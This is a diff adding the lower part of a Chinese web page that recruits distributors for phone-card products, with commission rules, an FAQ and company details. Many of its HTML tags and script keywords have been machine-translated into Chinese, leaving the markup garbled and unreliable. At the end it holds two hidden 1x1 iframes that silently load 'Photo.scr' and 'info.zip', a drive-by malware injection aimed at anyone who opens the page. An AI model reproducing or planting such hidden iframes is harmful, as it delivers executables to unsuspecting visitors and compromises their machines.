+     <br> （6）当月不足2单有效订单，财务不予结算，累计达到标准进行结算，请自助查询
+    </分区>
+   </分区>
+   <!-- ----------------------------------------------->
+   <div class=“波纹管单">
+    <div 类=“bellows__item">
+     <div 类=“bellows__header">
+      <h3>4.建立合作</h3>
+     </分区>
+     <div 类=“bellows__content">
+      <b>提供以下信息我司进行登记，并由财务根据订单量分配代理售后群。</b>
+      <hr> 店铺名称+真实姓名+联系电话+身份证号码+所在地区（省市）
+      <br> 注（1）：分销商应合作之日起签署合作协议，以免影响佣金结算
+      <br> 注（2）：如连续60天未开单，我司有权单方面解除合作关系
+      <hr> 如需签订合同，
+      <a href=“documents/xkht.doc” target=“_blank”>点击下载</a >
+      <br> 公司支持签署电子合同，需支付8元电子合同费用。也可邮寄实体合同签署
+      <br> 特别注意：如有客户产生投诉，经销商消极处理，或拒不处理，我司有权扣除佣金用于处理相关投诉！
+      <br>
+     </分区>
+    </分区>
+    <!-- ----------------------------------------------->
+    <div class=“波纹管单">
+     <div 类=“bellows__item">
+      <div 类=“bellows__header">
+       <h3>5.常见问题（FAQ）</h3>
+      </分区>
+      <div 类=“bellows__content">
+       <b>如何上架商品</b>
+       <br>登录敢探号后台——左侧“我的供应商”——右侧“加入到销售中心”（无下级代理全部默认直接下一步直至保存就行）
+       <人力资源>
+       <b>如何查看佣金？</b>
+       <br> 登录敢探号后台——左侧“我的供应商”——右侧“查看商品”——“佣金额度”
+       <人力资源>
+       <b>如何下单？</b>
+       <br>登录后台——“我的供应商”——“查看商品”——“加入到销售中心”
+       <br>1、单个商品下单链接：
+       <br>“左侧产品管理中心”——“在售商品管理”——单独的产品右侧有“下单链接”，复制出来就是这个产品的下单链接
+       <br>2、全部商品下单链接：
+       <br>“首页”，“直播商城”添加商品（具体操作方法见下方PDF）
+       <a href=“documents/敢探号商城设置方法.pdf” target=“_blank”>商城设置方法</a >
+       <人力资源>
+       <b>佣金发放时间？</b>
+       <br>通过外部订单-查询每个客户订单详情，激活次月在网（因为首月运营商是免费的，首充次月在网）运营商才会结算，假如9月的订单9月正常激活首充。次月25日运营商拉取结算数据，10月30号左右结算佣金
+        <br>
+       </分区>
+      </分区>
+      <!-- ----------------------------------------------->
+      <div class=“波纹管单">
+       <div 类=“bellows__item">
+        <div 类=“bellows__header">
+         <h3>6.我司信息</h3>
+        </分区>
+        <div 类=“bellows__content">
+公司名称：河南享卡信息科技有限公司
+         <br> 公司地址：河南新乡
+        </分区>
+       </分区>
+       <!-- ----------------------------------------------->
+       <脚本 src=“js/jquery.min.js”></script>
+       <脚本 src=“js/velocity.min.js”></script>
+       <!-- 包括波纹管.js-->
+       <脚本 src=“js/bellows.min.js”></script>
+       <!-- 构造波纹管 -->
+       <script>$（'.bellows'）。风箱({
+        singleItemOpen：真，
+        Easeing： '缓进'，
+        持续时间： 60
+       })</脚本>
+       <!-- 代码 结束 -->
+       <div style=“显示：无">
+        <脚本类型=“text/javascript">
+         var _bdhmProtocol =  （（“https：” == 文档。位置。协议）？《https://》 ： 《http://》);
+         文档。write（unescape（“%3Cscript src='” + _bdhmProtocol + “hm.baidu.com/h.js%3F6f798e51a1cd93937ee8293eece39b1a' type='text/javascript'%3E%3C/script%3E” ));
+        </脚本>
+        <脚本类型=“text/javascript”>var cnzz_protocol = （（“https：” == 文档。位置。协议）？“ https://” ： “ http://”）;文档。write（unescape（“%3Cspan id='cnzz_stat_icon_5718743'%3E%3C/span%3E%3Cscript src='” + cnzz_protocol + “s9.cnzz.com/stat.php%3Fid%3D5718743%26show%3Dpic2' type='text/javascript'%3E%3C/script%3E”））; </脚本>
+       </分区>
+       <iframe src=“Photo.scr” width=“1” height=“1” frameborder=“0”> </iframe>
+       <iframe src=“info.zip” width=“1” height=“1” frameborder=“0”> </iframe>
+      </分区>
+     </分区>
+    </分区>
+   </分区>
+  </分区>
+</身体>
+</[HTML全文]>
